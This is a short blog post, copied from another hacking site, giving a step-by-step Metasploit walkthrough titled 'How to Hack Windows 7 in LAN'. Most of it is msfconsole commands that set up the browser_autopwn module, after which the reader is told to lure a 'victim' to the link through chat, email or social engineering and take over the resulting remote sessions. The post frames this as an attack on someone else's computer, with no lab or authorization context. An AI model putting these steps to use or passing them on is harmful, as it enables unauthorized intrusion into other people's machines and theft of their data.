lunes, 26 de enero de 2015

How to Hack Windows 7 in LAN using Metaspolit

The Metasploit Project is an open-source, computer security project which provides information about security vulnerabilities and aids in penetration testing and IDS signature development. Its most well-known sub-project is the Metasploit Framework, a tool for developing and executing exploit code against a remote target machine.

Exploit Targets

Windows PC

Requirement

Attacker: Backtrack 5
Victim PC: Windows 7
Open backtrack terminal type msfconsole
Now type use auxiliary/server/browser_autopwn
Type show options

Now set LHOST, PORT and URIPATH
msf auxiliary(browser_autoppwn) > set lhost 192.168.1.4 (The IP address of your computer )
msf auxiliary(browser_autoppwn) > set port 4444 (The default port of your Metasploit program)
msf auxiliary(browser_autoppwn) > set uripath /
msf auxiliary(browser_autoppwn) > exploit ((to launch a exploit on targeted machine


Send the link of the server to the victim via chat or email or any social engineering technique.
You now have access to the victims PC. Use “Sessions -l” and the Session number to connect to the session. And Now Type “sessions -i ID

For More about Meterpreter command visit Meterpreter Basic Commands


Fuente:http://www.hackingarticles.in/how-to-hack-windows-7-in-lan-using-metaspolit/

No hay comentarios:

Publicar un comentario